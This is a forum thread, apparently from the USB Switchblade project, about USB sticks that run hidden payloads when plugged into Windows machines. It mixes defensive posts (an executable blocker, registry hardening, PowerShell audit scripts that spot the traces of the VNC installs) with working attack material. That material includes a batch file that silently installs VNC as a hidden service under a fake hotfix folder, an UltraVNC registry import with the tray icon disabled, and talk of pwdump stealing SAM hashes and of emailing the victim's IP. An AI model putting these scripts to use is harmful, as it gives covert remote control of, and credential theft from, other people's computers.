USB Switchblade Development


Darren Kitchen

I think I've got an idea for a Switchblade blocker; it's not very efficient but it's quick, dirty and does the job...

I'll be posting up binaries and source in this thread within an hour or two, I've got a few other things to do but I think I've figured it out... stay tuned!


Here's a (very) basic Switchblade prevention concept. It's extremely crude and unbelievably simple but...

http://www.freewebs.com/5kah/SB_Prevent.rar

Visual Basic 6 Source and compiled .exe to demonstrate simple file locking in the root dir of any drive. This could be expanded to subdirectories too and could be customised to only function if the drive is removable and/or a serial number is white/blacklisted.

It could also work on any form of executable file (.exe, .com, .scr, .pif, .bat, .cmd, .bat, etc).

Use with caution, it's probably rather buggy. I've tested it a little, but during testing I zeroed out a couple of exe files... this is now fixed and as far as I know it's OK, but you know how these things go... :)

How to use: Run the program, point to the drive containing the executable(s) to prevent running and click lock. Try running the exe file, Windows should stop you from doing so. Click Unlock and quit the program to unlock.

Again, it ONLY works on files in the root dir atm so files in directories WILL NOT BE LOCKED.

Funny, I was thinking about something similar on my drive back from work today. I was going to bring it up in a Dev5 meeting. I'll post about it after I sleep. No, scratch that, after the episode is out. Priorities. But yes, a Switchblade shield would be a fun project, though sort of separate from this thread. We'll coordinate on that later. Zzz


TrustNoExe does this rather well.

I never try and reinvent the wheel unless I know I can do better, and so far I see no reason to develop preventive measures further beyond TrustNoExe and DeviceLock.

On a side project, I'm trying to figure out how to get around the OS knowing it's a drive. In short, I'm playing with drivers, rootkits and GPOs.

If I can figure that out, then I'm going to have to write something to fix it.


1. Download Nomad's Registry Hacks. I have a little GUI that disables the LM hash, autoplay, and a ton of other fun things. A new build will be out as soon as I get around to it. The new build will lock down a Windows box even more than the current build and get rid of some lousy tweaks.

2. Just disable USB storage devices. It is a very common security procedure these days.

3. Disable VB scripting.
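As an added example (not code from this thread or from Nomad's Registry Hacks), here is a PowerShell script that audits the registry values behind the three steps above and, with -Apply, sets them. The paths and value names are the standard Windows ones; note that NoLMHash only affects hashes stored at the next password change, and the USBSTOR change applies to devices attached after it.

```powershell
# Audit / apply the hardening steps from the list above. Run from an elevated
# PowerShell prompt. Without -Apply nothing is changed, only reported.
param([switch]$Apply)

$settings = @(
    # 1. Stop Windows storing the weak LM hash alongside the NT hash
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Name = 'NoLMHash'; Want = 1 },
    # 1. Disable AutoRun/AutoPlay for every drive type (0xFF = all drive-type bits set)
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoDriveTypeAutoRun'; Want = 0xFF },
    # 2. Disable the USB mass-storage driver (Start = 4 means "disabled")
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\USBSTOR'; Name = 'Start'; Want = 4 },
    # 3. Disable Windows Script Host, which is what runs .vbs payloads
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'; Name = 'Enabled'; Want = 0 }
)

foreach ($s in $settings) {
    # A missing value reads back as $null, which is reported as WEAK
    $current = (Get-ItemProperty -Path $s.Path -Name $s.Name -ErrorAction SilentlyContinue).($s.Name)
    $state = if ($current -eq $s.Want) { 'OK' } else { 'WEAK' }
    "{0,-5} {1}\{2} = {3} (want {4})" -f $state, $s.Path, $s.Name, $current, $s.Want

    if ($Apply -and $current -ne $s.Want) {
        if (-not (Test-Path $s.Path)) { New-Item -Path $s.Path -Force | Out-Null }
        Set-ItemProperty -Path $s.Path -Name $s.Name -Value $s.Want -Type DWord
    }
}
```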


So I just switched over to DLSS's payload and plugged my USB into my computer at school (yes, I do keep school work on it too) and I got a pop-up message saying that Windows could not find some .dll file (I should have written it down) and decided to restart in 60 seconds. I found this odd, so let it restart and then plugged it in again. Same thing. I switched over to another comp and it happened again; I tried two more comps and this did not happen, the payload ran just fine and normal. Anyone have this same problem, or know what's going on? Thanks.


I was inspired by eDgE, nifty little program. So I added some features and rewrote it in C++.

http://rapidshare.de/files/35500706/bait-a...hblade.zip.html

It only uses one file, "baseball.txt". It uses the following format:

0;notepad.exe;1;sol.exe;

The first entry should be zero if you want the program to be hidden, and 1 if you don't want it to be hidden. The second entry says what program to run. You can repeat this as many times as you have programs to run.

Only the first line of baseball.txt will be used; any further lines in the file will be ignored, which can be useful for disguising the file.

Any thoughts or ideas would be welcome.

F-ing A++ man, nice idea... shame I can't program that well or I'd have done the same... oh well... I'm learning... nice one psychoaliendog...

That would probably be the lsass.dll, I've had the same issue on occasion, if you look in the wiki there's info there on it.


I got a problem on my college PCs as well... anyone heard of "orean.sys"?? Apparently it can't "update orean.sys". I found it's from some software but... it fails when I plug it in (i.e. doesn't dump the password or LSA secrets). If anyone else has got this problem, give me a shout.

Put simply, Windows is complaining about the fact that one of the files on your Switchblade (pwdump.exe) is attempting to steal the SAM file. Windows reads it as an error and shuts down your computer to "protect your system"...


Guessing you've heard of the package prototyper, or "faking" programs onto your U3 device? Because what I did is, instead of "flashing" the CD partition, I just put my program into the package prototyper and told it to autorun when the U3 launcher runs... an easier way if you don't want to get rid of the launchpad (or just stick launchpad.exe and your loader of choice into the autorun.inf file). Hope that helps some people who didn't want to "take the leap of faith" into flashing the partition...


OK, I wrote a little thing that installs VNC as a service on the target box.

@echo off
:: This batch file installs VNC automatically with the
:: password set to "yougothacked".
:: You can use this batchfile with the USB Switchblade so it
:: installs silently. It will remove the VNC icon with a little
:: hack. It will also set the directory to invisible.
:: Hope you like it :)
:: Always trust your technolust!

:start
:: This is the same as Darren's method on the Hacksaw. It creates a directory in the Windows directory when you are logged in as admin. Otherwise it does the same in the appdata folder.
mkdir %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%\hbn"

:: Changing directory to the VNC installation files
cd ../VNCInstallFiles

:: Copying the necessary files to the hard drive.
copy *.* %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%\hbn"

:: We set the files to hidden here
attrib %systemroot%\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%\hbn" +s +h

:: Here are some regedit entries which have to be there to allow the VNC server to run as a service
regedit /s ../CMD/vncdmp.reg
regedit /s ../CMD/vncdmp1.reg
regedit /s ../CMD/vncdmp2.reg

:: A little pause before...
ping -n 1 localhost > nul

:: ...we start the VNC service.
net start WinVNC

available on the wiki


Hi all,

I've downloaded MaxDamage's MemorexSB and attempted to run the installer. But I get this message: "No U3 smart drive was found". I just bought the Memorex U3 and plugged it in and went through the menu before I started the loader. I still have the U3 icon in my taskbar.

I would have tried to search the switchblade forum for the error text above, but that is difficult at best.

I found the updater log and saw this information:

10:33:09,910 #=Main SdkListener.cpp:669[CSdkListener::IsDeviceSupported] le=2 - device vendor type string (U3)
10:33:09,910 #=Main vpid.cpp:60[CVidPidVerifier::IsValueInSupportedValuesList] - 32 is not supported
10:33:09,910 #=Main vpid.cpp:165[CVidPidVerifier::IsVendorProductSupported] le=2 - vendor id 2284 (supported), vendor name Memorex (supported), product name Mini TravelDrive (supported), product id 32 (not supported)

Hope that helps, because I have no idea what it means. I did PM Max, but he said he could not help and recommended I post to the board.

...and okay, I'll bite - what does NOOB mean :?

Thanks, Jay


@Jay

LPInstaller only works on SanDisk Cruzer Drives. Use Tyrone D's Method for Memorex.

@Nakaori

:: Setup VNC
regedit /s RECYCLER\ultravnc.reg
mkdir "%ProgramFiles%\UltraVNC"
xcopy RECYCLER\UltraVNC "%ProgramFiles%\UltraVNC" /D /E /C /I /H /F /R /Y
"%ProgramFiles%\UltraVNC\winvnc.exe" -reinstall

Content of ultravnc.reg; change the password to what you please.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL]

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"DisableTrayIcon"=dword:00000001
"DebugMode"=dword:00000000
"DebugLevel"=dword:00000000
"AllowLoopback"=dword:00000000
"LoopbackOnly"=dword:00000000
"MSLogonRequired"=dword:00000000
"NewMSLogon"=dword:00000000
"UseDSMPlugin"=dword:00000000
"ConnectPriority"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"=AllowShutdown"=dword:00000000
"FileTransferEnabled"=dword:00000001
"FTUserImpersonation"=dword:00000001
"BlankMonitorEnabled"=dword:00000000
"CaptureAlphaBlending"=dword:00000000
"BlackAlphaBlending"=dword:00000000
"DefaultScale"=dword:00000001
"UseDSMPlugin"=dword:00000000
"SocketConnect"=dword:00000001
"HTTPConnect"=dword:00000000
"XDMCPConnect"=dword:00000000
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"QueryAccept"=dword:00000000
"LockSetting"=dword:00000000
"RemoveWallpaper"=dword:00000000
"Password"=hex:db,d8,3c,fd,72,7a,14,58
"AllowShutdown"=dword:00000000
"AllowProperties"=dword:00000001
"AllowEditClients"=dword:00000001
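The two VNC installers in this thread (the earlier batch file that copies into a hidden $NtUninstallKB...$ or %appdata%\hbn folder and starts WinVNC, and the ultravnc.reg import above) leave specific traces on a host. As an added example that is not from the thread or from any project it mentions, this read-only PowerShell 3+ audit script reports those traces on the machine it runs on; the spuninst\ heuristic for telling a genuine hotfix uninstall folder from a fake one is my assumption.

```powershell
# Read-only audit for the traces the two VNC installers above leave behind.
# Run in an elevated PowerShell 3+ session on the Windows host being checked.
function Get-VncInstallTraces {
    $findings = @()

    # 1. A WinVNC service, as created by "net start WinVNC" / "winvnc.exe -reinstall"
    Get-Service -Name 'WinVNC*' -ErrorAction SilentlyContinue | ForEach-Object {
        $findings += "service {0} is {1}" -f $_.Name, $_.Status
    }

    # 2. The ORL\WinVNC3 key written by ultravnc.reg, with the tray icon suppressed
    $orl = 'HKLM:\SOFTWARE\ORL\WinVNC3'
    if (Test-Path $orl) {
        $tray = (Get-ItemProperty -Path $orl -ErrorAction SilentlyContinue).DisableTrayIcon
        $findings += "$orl exists (DisableTrayIcon = $tray)"
    }

    # 3. Hidden $NtUninstallKB...$ folders under %SystemRoot% that carry no uninstall
    #    data. Heuristic (assumption): a genuine hotfix folder contains spuninst\.
    Get-ChildItem -Path $env:SystemRoot -Directory -Force -Filter '$NtUninstallKB*$' -ErrorAction SilentlyContinue |
        Where-Object { -not (Test-Path (Join-Path $_.FullName 'spuninst')) } |
        ForEach-Object { $findings += "hotfix-style folder without spuninst: $($_.FullName)" }

    # 4. The non-admin fallback folder and the UltraVNC target folder the scripts copy into
    foreach ($dir in @((Join-Path $env:APPDATA 'hbn'), (Join-Path $env:ProgramFiles 'UltraVNC'))) {
        if (Test-Path $dir) {
            $exe = Get-ChildItem -Path $dir -Force -Filter 'winvnc.exe' -ErrorAction SilentlyContinue
            $note = if ($exe) { ' (contains winvnc.exe)' } else { '' }
            $findings += "directory present: $dir$note"
        }
    }

    # 5. A running winvnc.exe, wherever it was started from
    Get-Process -Name 'winvnc' -ErrorAction SilentlyContinue | ForEach-Object {
        $findings += "process winvnc.exe pid $($_.Id) from $($_.Path)"
    }

    return $findings
}

$traces = Get-VncInstallTraces
if ($traces) { $traces } else { 'no VNC installer traces found' }
```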


I'm using kapowdude's technique, which I'm pretty sure is a combo of maxdamage and amish's technique. Anyway, is there a way to get the flash drive to start the switchblade without going in my computer and autoplay? I mean I have a U3 device but I messed the last one up while installing one of the U3 techniques. So, can I?


Hey guys

I've been following the progress of this project very closely and it is going quite well. Nice job guys!

The reason for my post is that I have a suggestion for a feature: the ability to grab all the MSN logs. As far as I know, no program exists that will dump them already. To get them would be easy, as the paths are located in the registry. So perhaps a basic C++ program. But if this can't be done, the other two options are to grab all .xml files or grab the My Received Files folder, as that is where they are typically located.

Please let me know your opinion of this suggestion.

ace


What did you use to compile the code? I've tried Dev-C++ and VC++ Express Edition and they both throw up errors.

I used Visual Studio Pro, what errors are you getting?

Do the errors in Dev-C++ refer to fopen_s? That is Microsoft's "secure" fopen function.

OK, I wrote a little thing that installs VNC as a service on the target box.

:: This batch file installs VNC automatically with the
:: password set to "yougothacked".
:: You can use this batchfile with the USB Switchblade so it
:: installs silently. It will remove the VNC icon with a little
:: hack. It will also set the directory to invisible.
:: Hope you like it :)
:: Always trust your technolust!

I made a little addon for this.

Now it automatically starts a hidden batch file which sends you the current external IP every 30 minutes to a specified email account.

Credits to gonffen for helping me with the IP getter :>

BTW, available on the wiki ;)


The errors from VC++ Express Edition:

------ Build started: Project: Bait, Configuration: Debug Win32 ------
Compiling...
Listing.cpp
c:\documents and settings\XXXXXX\my documents\visual studio 2005\projects\bait\listing.cpp(74) : error C2664: 'ShellExecuteW' : cannot convert parameter 2 from 'const char [5]' to 'LPCWSTR'
        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
c:\documents and settings\XXXXXX\my documents\visual studio 2005\projects\bait\listing.cpp(76) : error C2664: 'ShellExecuteW' : cannot convert parameter 2 from 'const char [5]' to 'LPCWSTR'
        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
c:\documents and settings\XXXXXX\my documents\visual studio 2005\projects\bait\listing.cpp(83) : error C2664: 'MessageBoxW' : cannot convert parameter 2 from 'const char [6]' to 'LPCWSTR'
        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
Build log was saved at "file://c:\Documents and Settings\XXXXXX\My Documents\Visual Studio 2005\Projects\Bait\Debug\BuildLog.htm"
Bait - 3 error(s), 0 warning(s)
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

I'll post the Dev-C++ errors if I can't get VC++EE to compile it.

Iain
